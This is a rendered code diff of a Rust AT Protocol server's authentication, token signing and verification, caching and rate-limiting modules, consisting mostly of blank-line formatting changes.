#[serde(rename_all = "camelCase")]
13
14
pub struct CheckSignupQueueOutput {
···
17
18
#[serde(skip_serializing_if = "Option::is_none")]
18
19
pub estimated_time_ms: Option<i64>,
19
20
}
21
+
20
22
pub async fn check_signup_queue(
21
23
State(state): State<AppState>,
22
24
headers: HeaderMap,
+2
src/api/validation.rs
+2
src/api/validation.rs
···
3
3
pub const MAX_DOMAIN_LENGTH: usize = 253;
4
4
pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63;
5
5
const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-";
6
+
6
7
pub fn is_valid_email(email: &str) -> bool {
7
8
let email = email.trim();
8
9
if email.is_empty() || email.len() > MAX_EMAIL_LENGTH {
···
49
50
}
50
51
true
51
52
}
53
+
52
54
#[cfg(test)]
53
55
mod tests {
54
56
use super::*;
+27
src/auth/extractor.rs
+27
src/auth/extractor.rs
···
5
5
Json,
6
6
};
7
7
use serde_json::json;
8
+
8
9
use crate::state::AppState;
9
10
use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated};
11
+
10
12
pub struct BearerAuth(pub AuthenticatedUser);
13
+
11
14
#[derive(Debug)]
12
15
pub enum AuthError {
13
16
MissingToken,
···
16
19
AccountDeactivated,
17
20
AccountTakedown,
18
21
}
22
+
19
23
impl IntoResponse for AuthError {
20
24
fn into_response(self) -> Response {
21
25
let (status, error, message) = match self {
···
45
49
"Account has been taken down",
46
50
),
47
51
};
52
+
48
53
(status, Json(json!({ "error": error, "message": message }))).into_response()
49
54
}
50
55
}
56
+
51
57
fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> {
52
58
let auth_header = auth_header.trim();
59
+
53
60
if auth_header.len() < 8 {
54
61
return Err(AuthError::InvalidFormat);
55
62
}
63
+
56
64
let prefix = &auth_header[..7];
57
65
if !prefix.eq_ignore_ascii_case("bearer ") {
58
66
return Err(AuthError::InvalidFormat);
59
67
}
68
+
60
69
let token = auth_header[7..].trim();
61
70
if token.is_empty() {
62
71
return Err(AuthError::InvalidFormat);
63
72
}
73
+
64
74
Ok(token)
65
75
}
76
+
66
77
pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> {
67
78
let header = auth_header?;
68
79
let header = header.trim();
80
+
69
81
if header.len() < 7 {
70
82
return None;
71
83
}
84
+
72
85
if !header[..7].eq_ignore_ascii_case("bearer ") {
73
86
return None;
74
87
}
88
+
75
89
let token = header[7..].trim();
76
90
if token.is_empty() {
77
91
return None;
78
92
}
93
+
79
94
Some(token.to_string())
80
95
}
96
+
81
97
impl FromRequestParts<AppState> for BearerAuth {
82
98
type Rejection = AuthError;
99
+
83
100
async fn from_request_parts(
84
101
parts: &mut Parts,
85
102
state: &AppState,
···
90
107
.ok_or(AuthError::MissingToken)?
91
108
.to_str()
92
109
.map_err(|_| AuthError::InvalidFormat)?;
110
+
93
111
let token = extract_bearer_token(auth_header)?;
112
+
94
113
match validate_bearer_token_cached(&state.db, &state.cache, token).await {
95
114
Ok(user) => Ok(BearerAuth(user)),
96
115
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
···
99
118
}
100
119
}
101
120
}
121
+
102
122
pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser);
123
+
103
124
impl FromRequestParts<AppState> for BearerAuthAllowDeactivated {
104
125
type Rejection = AuthError;
126
+
105
127
async fn from_request_parts(
106
128
parts: &mut Parts,
107
129
state: &AppState,
···
112
134
.ok_or(AuthError::MissingToken)?
113
135
.to_str()
114
136
.map_err(|_| AuthError::InvalidFormat)?;
137
+
115
138
let token = extract_bearer_token(auth_header)?;
139
+
116
140
match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await {
117
141
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
118
142
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
···
120
144
}
121
145
}
122
146
}
147
+
123
148
#[cfg(test)]
124
149
mod tests {
125
150
use super::*;
151
+
126
152
#[test]
127
153
fn test_extract_bearer_token() {
128
154
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
···
130
156
assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123");
131
157
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
132
158
assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123");
159
+
133
160
assert!(extract_bearer_token("Basic abc123").is_err());
134
161
assert!(extract_bearer_token("Bearer").is_err());
135
162
assert!(extract_bearer_token("Bearer ").is_err());
+35
-1
src/auth/mod.rs
+35
-1
src/auth/mod.rs
···
3
3
use std::fmt;
4
4
use std::sync::Arc;
5
5
use std::time::Duration;
6
+
6
7
use crate::cache::Cache;
8
+
7
9
pub mod extractor;
8
10
pub mod token;
9
11
pub mod verify;
12
+
10
13
pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header};
11
14
pub use token::{
12
15
create_access_token, create_refresh_token, create_service_token,
···
16
19
SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED,
17
20
};
18
21
pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token};
22
+
19
23
const KEY_CACHE_TTL_SECS: u64 = 300;
20
24
const SESSION_CACHE_TTL_SECS: u64 = 60;
25
+
21
26
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
22
27
pub enum TokenValidationError {
23
28
AccountDeactivated,
···
25
30
KeyDecryptionFailed,
26
31
AuthenticationFailed,
27
32
}
33
+
28
34
impl fmt::Display for TokenValidationError {
29
35
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
30
36
match self {
···
35
41
}
36
42
}
37
43
}
44
+
38
45
pub struct AuthenticatedUser {
39
46
pub did: String,
40
47
pub key_bytes: Option<Vec<u8>>,
41
48
pub is_oauth: bool,
42
49
}
50
+
43
51
pub async fn validate_bearer_token(
44
52
db: &PgPool,
45
53
token: &str,
46
54
) -> Result<AuthenticatedUser, TokenValidationError> {
47
55
validate_bearer_token_with_options_internal(db, None, token, false).await
48
56
}
57
+
49
58
pub async fn validate_bearer_token_allow_deactivated(
50
59
db: &PgPool,
51
60
token: &str,
52
61
) -> Result<AuthenticatedUser, TokenValidationError> {
53
62
validate_bearer_token_with_options_internal(db, None, token, true).await
54
63
}
64
+
55
65
pub async fn validate_bearer_token_cached(
56
66
db: &PgPool,
57
67
cache: &Arc<dyn Cache>,
···
59
69
) -> Result<AuthenticatedUser, TokenValidationError> {
60
70
validate_bearer_token_with_options_internal(db, Some(cache), token, false).await
61
71
}
72
+
62
73
pub async fn validate_bearer_token_cached_allow_deactivated(
63
74
db: &PgPool,
64
75
cache: &Arc<dyn Cache>,
···
66
77
) -> Result<AuthenticatedUser, TokenValidationError> {
67
78
validate_bearer_token_with_options_internal(db, Some(cache), token, true).await
68
79
}
80
+
69
81
async fn validate_bearer_token_with_options_internal(
70
82
db: &PgPool,
71
83
cache: Option<&Arc<dyn Cache>>,
···
73
85
allow_deactivated: bool,
74
86
) -> Result<AuthenticatedUser, TokenValidationError> {
75
87
let did_from_token = get_did_from_token(token).ok();
88
+
76
89
if let Some(ref did) = did_from_token {
77
90
let key_cache_key = format!("auth:key:{}", did);
78
91
let mut cached_key: Option<Vec<u8>> = None;
92
+
79
93
if let Some(c) = cache {
80
94
cached_key = c.get_bytes(&key_cache_key).await;
81
95
if cached_key.is_some() {
···
84
98
crate::metrics::record_auth_cache_miss("key");
85
99
}
86
100
}
101
+
87
102
let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key {
88
103
let user_status = sqlx::query!(
89
104
"SELECT deactivated_at, takedown_ref FROM users WHERE did = $1",
···
93
108
.await
94
109
.ok()
95
110
.flatten();
111
+
96
112
match user_status {
97
113
Some(status) => (Some(key), status.deactivated_at, status.takedown_ref),
98
114
None => (None, None, None),
···
112
128
{
113
129
let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version)
114
130
.map_err(|_| TokenValidationError::KeyDecryptionFailed)?;
131
+
115
132
if let Some(c) = cache {
116
133
let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await;
117
134
}
135
+
118
136
(Some(key), user.deactivated_at, user.takedown_ref)
119
137
} else {
120
138
(None, None, None)
121
139
}
122
140
};
141
+
123
142
if let Some(decrypted_key) = decrypted_key {
124
143
if !allow_deactivated && deactivated_at.is_some() {
125
144
return Err(TokenValidationError::AccountDeactivated);
126
145
}
146
+
127
147
if takedown_ref.is_some() {
128
148
return Err(TokenValidationError::AccountTakedown);
129
149
}
150
+
130
151
if let Ok(token_data) = verify_access_token(token, &decrypted_key) {
131
152
let jti = &token_data.claims.jti;
132
153
let session_cache_key = format!("auth:session:{}:{}", did, jti);
133
154
let mut session_valid = false;
155
+
134
156
if let Some(c) = cache {
135
157
if let Some(cached_value) = c.get(&session_cache_key).await {
136
158
session_valid = cached_value == "1";
···
139
161
crate::metrics::record_auth_cache_miss("session");
140
162
}
141
163
}
164
+
142
165
if !session_valid {
143
166
let session_exists = sqlx::query_scalar!(
144
167
"SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()",
···
149
172
.await
150
173
.ok()
151
174
.flatten();
175
+
152
176
session_valid = session_exists.is_some();
177
+
153
178
if session_valid {
154
179
if let Some(c) = cache {
155
180
let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await;
156
181
}
157
182
}
158
183
}
184
+
159
185
if session_valid {
160
186
return Ok(AuthenticatedUser {
161
187
did: did.clone(),
···
166
192
}
167
193
}
168
194
}
195
+
169
196
if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) {
170
197
if let Some(oauth_token) = sqlx::query!(
171
198
r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref
···
182
209
if !allow_deactivated && oauth_token.deactivated_at.is_some() {
183
210
return Err(TokenValidationError::AccountDeactivated);
184
211
}
212
+
185
213
if oauth_token.takedown_ref.is_some() {
186
214
return Err(TokenValidationError::AccountTakedown);
187
215
}
216
+
188
217
let now = chrono::Utc::now();
189
218
if oauth_token.expires_at > now {
190
219
return Ok(AuthenticatedUser {
···
195
224
}
196
225
}
197
226
}
227
+
198
228
Err(TokenValidationError::AuthenticationFailed)
199
229
}
230
+
200
231
pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) {
201
232
let key_cache_key = format!("auth:key:{}", did);
202
233
let _ = cache.delete(&key_cache_key).await;
203
234
}
235
+
204
236
#[derive(Debug, Serialize, Deserialize)]
205
237
pub struct Claims {
206
238
pub iss: String,
···
214
246
pub lxm: Option<String>,
215
247
pub jti: String,
216
248
}
249
+
217
250
#[derive(Debug, Serialize, Deserialize)]
218
251
pub struct Header {
219
252
pub alg: String,
220
253
pub typ: String,
221
254
}
255
+
222
256
#[derive(Debug, Serialize, Deserialize)]
223
257
pub struct UnsafeClaims {
224
258
pub iss: String,
225
259
pub sub: Option<String>,
226
260
}
227
-
// fancy boy TokenData equivalent for compatibility/structure
261
+
228
262
pub struct TokenData<T> {
229
263
pub claims: T,
230
264
}
+42
src/auth/token.rs
+42
src/auth/token.rs
···
7
7
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
8
8
use sha2::Sha256;
9
9
use uuid;
10
+
10
11
type HmacSha256 = Hmac<Sha256>;
12
+
11
13
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
12
14
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
13
15
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
···
15
17
pub const SCOPE_REFRESH: &str = "com.atproto.refresh";
16
18
pub const SCOPE_APP_PASS: &str = "com.atproto.appPass";
17
19
pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged";
20
+
18
21
pub struct TokenWithMetadata {
19
22
pub token: String,
20
23
pub jti: String,
21
24
pub expires_at: DateTime<Utc>,
22
25
}
26
+
23
27
pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> {
24
28
Ok(create_access_token_with_metadata(did, key_bytes)?.token)
25
29
}
30
+
26
31
pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> {
27
32
Ok(create_refresh_token_with_metadata(did, key_bytes)?.token)
28
33
}
34
+
29
35
pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
30
36
create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120))
31
37
}
38
+
32
39
pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
33
40
create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90))
34
41
}
42
+
35
43
pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> {
36
44
let signing_key = SigningKey::from_slice(key_bytes)?;
45
+
37
46
let expiration = Utc::now()
38
47
.checked_add_signed(Duration::seconds(60))
39
48
.expect("valid timestamp")
40
49
.timestamp();
50
+
41
51
let claims = Claims {
42
52
iss: did.to_owned(),
43
53
sub: did.to_owned(),
···
48
58
lxm: Some(lxm.to_string()),
49
59
jti: uuid::Uuid::new_v4().to_string(),
50
60
};
61
+
51
62
sign_claims(claims, &signing_key)
52
63
}
64
+
53
65
fn create_signed_token_with_metadata(
54
66
did: &str,
55
67
scope: &str,
···
58
70
duration: Duration,
59
71
) -> Result<TokenWithMetadata> {
60
72
let signing_key = SigningKey::from_slice(key_bytes)?;
73
+
61
74
let expires_at = Utc::now()
62
75
.checked_add_signed(duration)
63
76
.expect("valid timestamp");
77
+
64
78
let expiration = expires_at.timestamp();
65
79
let jti = uuid::Uuid::new_v4().to_string();
80
+
66
81
let claims = Claims {
67
82
iss: did.to_owned(),
68
83
sub: did.to_owned(),
···
76
91
lxm: None,
77
92
jti: jti.clone(),
78
93
};
94
+
79
95
let token = sign_claims_with_type(claims, &signing_key, typ)?;
96
+
80
97
Ok(TokenWithMetadata {
81
98
token,
82
99
jti,
83
100
expires_at,
84
101
})
85
102
}
103
+
86
104
fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> {
87
105
sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE)
88
106
}
107
+
89
108
fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> {
90
109
let header = Header {
91
110
alg: "ES256K".to_string(),
92
111
typ: typ.to_string(),
93
112
};
113
+
94
114
let header_json = serde_json::to_string(&header)?;
95
115
let claims_json = serde_json::to_string(&claims)?;
116
+
96
117
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
97
118
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
119
+
98
120
let message = format!("{}.{}", header_b64, claims_b64);
99
121
let signature: Signature = key.sign(message.as_bytes());
100
122
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
123
+
101
124
Ok(format!("{}.{}", message, signature_b64))
102
125
}
126
+
103
127
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
104
128
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
105
129
}
130
+
106
131
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
107
132
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
108
133
}
134
+
109
135
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
110
136
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
111
137
}
138
+
112
139
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
113
140
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
114
141
}
142
+
115
143
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
116
144
let expiration = Utc::now()
117
145
.checked_add_signed(Duration::seconds(60))
118
146
.expect("valid timestamp")
119
147
.timestamp();
148
+
120
149
let claims = Claims {
121
150
iss: did.to_owned(),
122
151
sub: did.to_owned(),
···
127
156
lxm: Some(lxm.to_string()),
128
157
jti: uuid::Uuid::new_v4().to_string(),
129
158
};
159
+
130
160
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
131
161
}
162
+
132
163
fn create_hs256_token_with_metadata(
133
164
did: &str,
134
165
scope: &str,
···
139
170
let expires_at = Utc::now()
140
171
.checked_add_signed(duration)
141
172
.expect("valid timestamp");
173
+
142
174
let expiration = expires_at.timestamp();
143
175
let jti = uuid::Uuid::new_v4().to_string();
176
+
144
177
let claims = Claims {
145
178
iss: did.to_owned(),
146
179
sub: did.to_owned(),
···
154
187
lxm: None,
155
188
jti: jti.clone(),
156
189
};
190
+
157
191
let token = sign_claims_hs256(claims, typ, secret)?;
192
+
158
193
Ok(TokenWithMetadata {
159
194
token,
160
195
jti,
161
196
expires_at,
162
197
})
163
198
}
199
+
164
200
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
165
201
let header = Header {
166
202
alg: "HS256".to_string(),
167
203
typ: typ.to_string(),
168
204
};
205
+
169
206
let header_json = serde_json::to_string(&header)?;
170
207
let claims_json = serde_json::to_string(&claims)?;
208
+
171
209
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
172
210
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
211
+
173
212
let message = format!("{}.{}", header_b64, claims_b64);
213
+
174
214
let mut mac = HmacSha256::new_from_slice(secret)
175
215
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
176
216
mac.update(message.as_bytes());
217
+
177
218
let signature = mac.finalize().into_bytes();
178
219
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
220
+
179
221
Ok(format!("{}.{}", message, signature_b64))
180
222
}
+48
src/auth/verify.rs
+48
src/auth/verify.rs
···
8
8
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
9
9
use sha2::Sha256;
10
10
use subtle::ConstantTimeEq;
11
+
11
12
type HmacSha256 = Hmac<Sha256>;
13
+
12
14
pub fn get_did_from_token(token: &str) -> Result<String, String> {
13
15
let parts: Vec<&str> = token.split('.').collect();
14
16
if parts.len() != 3 {
15
17
return Err("Invalid token format".to_string());
16
18
}
19
+
17
20
let payload_bytes = URL_SAFE_NO_PAD
18
21
.decode(parts[1])
19
22
.map_err(|e| format!("Base64 decode failed: {}", e))?;
23
+
20
24
let claims: UnsafeClaims =
21
25
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
26
+
22
27
Ok(claims.sub.unwrap_or(claims.iss))
23
28
}
29
+
24
30
pub fn get_jti_from_token(token: &str) -> Result<String, String> {
25
31
let parts: Vec<&str> = token.split('.').collect();
26
32
if parts.len() != 3 {
27
33
return Err("Invalid token format".to_string());
28
34
}
35
+
29
36
let payload_bytes = URL_SAFE_NO_PAD
30
37
.decode(parts[1])
31
38
.map_err(|e| format!("Base64 decode failed: {}", e))?;
39
+
32
40
let claims: serde_json::Value =
33
41
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
42
+
34
43
claims.get("jti")
35
44
.and_then(|j| j.as_str())
36
45
.map(|s| s.to_string())
37
46
.ok_or_else(|| "No jti claim in token".to_string())
38
47
}
48
+
39
49
pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
40
50
verify_token_internal(token, key_bytes, None, None)
41
51
}
52
+
42
53
pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
43
54
verify_token_internal(
44
55
token,
···
47
58
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
48
59
)
49
60
}
61
+
50
62
pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
51
63
verify_token_internal(
52
64
token,
···
55
67
Some(&[SCOPE_REFRESH]),
56
68
)
57
69
}
70
+
58
71
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
59
72
verify_token_hs256_internal(
60
73
token,
···
63
76
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
64
77
)
65
78
}
79
+
66
80
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
67
81
verify_token_hs256_internal(
68
82
token,
···
71
85
Some(&[SCOPE_REFRESH]),
72
86
)
73
87
}
88
+
74
89
fn verify_token_internal(
75
90
token: &str,
76
91
key_bytes: &[u8],
···
81
96
if parts.len() != 3 {
82
97
return Err(anyhow!("Invalid token format"));
83
98
}
99
+
84
100
let header_b64 = parts[0];
85
101
let claims_b64 = parts[1];
86
102
let signature_b64 = parts[2];
103
+
87
104
let header_bytes = URL_SAFE_NO_PAD
88
105
.decode(header_b64)
89
106
.context("Base64 decode of header failed")?;
107
+
90
108
let header: Header =
91
109
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
110
+
92
111
if let Some(expected) = expected_typ {
93
112
if header.typ != expected {
94
113
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
95
114
}
96
115
}
116
+
97
117
let signature_bytes = URL_SAFE_NO_PAD
98
118
.decode(signature_b64)
99
119
.context("Base64 decode of signature failed")?;
120
+
100
121
let signature = Signature::from_slice(&signature_bytes)
101
122
.map_err(|e| anyhow!("Invalid signature format: {}", e))?;
123
+
102
124
let signing_key = SigningKey::from_slice(key_bytes)?;
103
125
let verifying_key = VerifyingKey::from(&signing_key);
126
+
104
127
let message = format!("{}.{}", header_b64, claims_b64);
105
128
verifying_key
106
129
.verify(message.as_bytes(), &signature)
107
130
.map_err(|e| anyhow!("Signature verification failed: {}", e))?;
131
+
108
132
let claims_bytes = URL_SAFE_NO_PAD
109
133
.decode(claims_b64)
110
134
.context("Base64 decode of claims failed")?;
135
+
111
136
let claims: Claims =
112
137
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
138
+
113
139
let now = Utc::now().timestamp() as usize;
114
140
if claims.exp < now {
115
141
return Err(anyhow!("Token expired"));
116
142
}
143
+
117
144
if let Some(scopes) = allowed_scopes {
118
145
let token_scope = claims.scope.as_deref().unwrap_or("");
119
146
if !scopes.contains(&token_scope) {
120
147
return Err(anyhow!("Invalid token scope: {}", token_scope));
121
148
}
122
149
}
150
+
123
151
Ok(TokenData { claims })
124
152
}
153
+
125
154
fn verify_token_hs256_internal(
126
155
token: &str,
127
156
secret: &[u8],
···
132
161
if parts.len() != 3 {
133
162
return Err(anyhow!("Invalid token format"));
134
163
}
164
+
135
165
let header_b64 = parts[0];
136
166
let claims_b64 = parts[1];
137
167
let signature_b64 = parts[2];
168
+
138
169
let header_bytes = URL_SAFE_NO_PAD
139
170
.decode(header_b64)
140
171
.context("Base64 decode of header failed")?;
172
+
141
173
let header: Header =
142
174
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
175
+
143
176
if header.alg != "HS256" {
144
177
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
145
178
}
179
+
146
180
if let Some(expected) = expected_typ {
147
181
if header.typ != expected {
148
182
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
149
183
}
150
184
}
185
+
151
186
let signature_bytes = URL_SAFE_NO_PAD
152
187
.decode(signature_b64)
153
188
.context("Base64 decode of signature failed")?;
189
+
154
190
let message = format!("{}.{}", header_b64, claims_b64);
191
+
155
192
let mut mac = HmacSha256::new_from_slice(secret)
156
193
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
157
194
mac.update(message.as_bytes());
195
+
158
196
let expected_signature = mac.finalize().into_bytes();
159
197
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
198
+
160
199
if !is_valid {
161
200
return Err(anyhow!("Signature verification failed"));
162
201
}
202
+
163
203
let claims_bytes = URL_SAFE_NO_PAD
164
204
.decode(claims_b64)
165
205
.context("Base64 decode of claims failed")?;
206
+
166
207
let claims: Claims =
167
208
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
209
+
168
210
let now = Utc::now().timestamp() as usize;
169
211
if claims.exp < now {
170
212
return Err(anyhow!("Token expired"));
171
213
}
214
+
172
215
if let Some(scopes) = allowed_scopes {
173
216
let token_scope = claims.scope.as_deref().unwrap_or("");
174
217
if !scopes.contains(&token_scope) {
175
218
return Err(anyhow!("Invalid token scope: {}", token_scope));
176
219
}
177
220
}
221
+
178
222
Ok(TokenData { claims })
179
223
}
224
+
180
225
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
181
226
let parts: Vec<&str> = token.split('.').collect();
182
227
if parts.len() != 3 {
183
228
return Err("Invalid token format".to_string());
184
229
}
230
+
185
231
let header_bytes = URL_SAFE_NO_PAD
186
232
.decode(parts[0])
187
233
.map_err(|e| format!("Base64 decode failed: {}", e))?;
234
+
188
235
let header: Header =
189
236
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
237
+
190
238
Ok(header.alg)
191
239
}
+24
src/cache/mod.rs
+24
src/cache/mod.rs
···
2
2
use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64};
3
3
use std::sync::Arc;
4
4
use std::time::Duration;
5
+
5
6
#[derive(Debug, thiserror::Error)]
6
7
pub enum CacheError {
7
8
#[error("Cache connection error: {0}")]
···
9
10
#[error("Serialization error: {0}")]
10
11
Serialization(String),
11
12
}
13
+
12
14
#[async_trait]
13
15
pub trait Cache: Send + Sync {
14
16
async fn get(&self, key: &str) -> Option<String>;
···
22
24
self.set(key, &encoded, ttl).await
23
25
}
24
26
}
27
+
25
28
#[derive(Clone)]
26
29
pub struct ValkeyCache {
27
30
conn: redis::aio::ConnectionManager,
28
31
}
32
+
29
33
impl ValkeyCache {
30
34
pub async fn new(url: &str) -> Result<Self, CacheError> {
31
35
let client = redis::Client::open(url)
···
36
40
.map_err(|e| CacheError::Connection(e.to_string()))?;
37
41
Ok(Self { conn: manager })
38
42
}
43
+
39
44
pub fn connection(&self) -> redis::aio::ConnectionManager {
40
45
self.conn.clone()
41
46
}
42
47
}
48
+
43
49
#[async_trait]
44
50
impl Cache for ValkeyCache {
45
51
async fn get(&self, key: &str) -> Option<String> {
···
51
57
.ok()
52
58
.flatten()
53
59
}
60
+
54
61
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
55
62
let mut conn = self.conn.clone();
56
63
redis::cmd("SET")
···
62
69
.await
63
70
.map_err(|e| CacheError::Connection(e.to_string()))
64
71
}
72
+
65
73
async fn delete(&self, key: &str) -> Result<(), CacheError> {
66
74
let mut conn = self.conn.clone();
67
75
redis::cmd("DEL")
···
71
79
.map_err(|e| CacheError::Connection(e.to_string()))
72
80
}
73
81
}
82
+
74
83
pub struct NoOpCache;
84
+
75
85
#[async_trait]
76
86
impl Cache for NoOpCache {
77
87
async fn get(&self, _key: &str) -> Option<String> {
78
88
None
79
89
}
90
+
80
91
async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> {
81
92
Ok(())
82
93
}
94
+
83
95
async fn delete(&self, _key: &str) -> Result<(), CacheError> {
84
96
Ok(())
85
97
}
86
98
}
99
+
87
100
#[async_trait]
88
101
pub trait DistributedRateLimiter: Send + Sync {
89
102
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool;
90
103
}
104
+
91
105
#[derive(Clone)]
92
106
pub struct RedisRateLimiter {
93
107
conn: redis::aio::ConnectionManager,
94
108
}
109
+
95
110
impl RedisRateLimiter {
96
111
pub fn new(conn: redis::aio::ConnectionManager) -> Self {
97
112
Self { conn }
98
113
}
99
114
}
115
+
100
116
#[async_trait]
101
117
impl DistributedRateLimiter for RedisRateLimiter {
102
118
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool {
···
124
140
count <= limit as i64
125
141
}
126
142
}
143
+
127
144
pub struct NoOpRateLimiter;
145
+
128
146
#[async_trait]
129
147
impl DistributedRateLimiter for NoOpRateLimiter {
130
148
async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool {
131
149
true
132
150
}
133
151
}
152
+
134
153
pub enum CacheBackend {
135
154
Valkey(ValkeyCache),
136
155
NoOp,
137
156
}
157
+
138
158
impl CacheBackend {
139
159
pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> {
140
160
match self {
···
145
165
}
146
166
}
147
167
}
168
+
148
169
#[async_trait]
149
170
impl Cache for CacheBackend {
150
171
async fn get(&self, key: &str) -> Option<String> {
···
153
174
CacheBackend::NoOp => None,
154
175
}
155
176
}
177
+
156
178
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
157
179
match self {
158
180
CacheBackend::Valkey(c) => c.set(key, value, ttl).await,
159
181
CacheBackend::NoOp => Ok(()),
160
182
}
161
183
}
184
+
162
185
async fn delete(&self, key: &str) -> Result<(), CacheError> {
163
186
match self {
164
187
CacheBackend::Valkey(c) => c.delete(key).await,
···
166
189
}
167
190
}
168
191
}
192
+
169
193
pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) {
170
194
match std::env::var("VALKEY_URL") {
171
195
Ok(url) => match ValkeyCache::new(&url).await {
+45
src/circuit_breaker.rs
+45
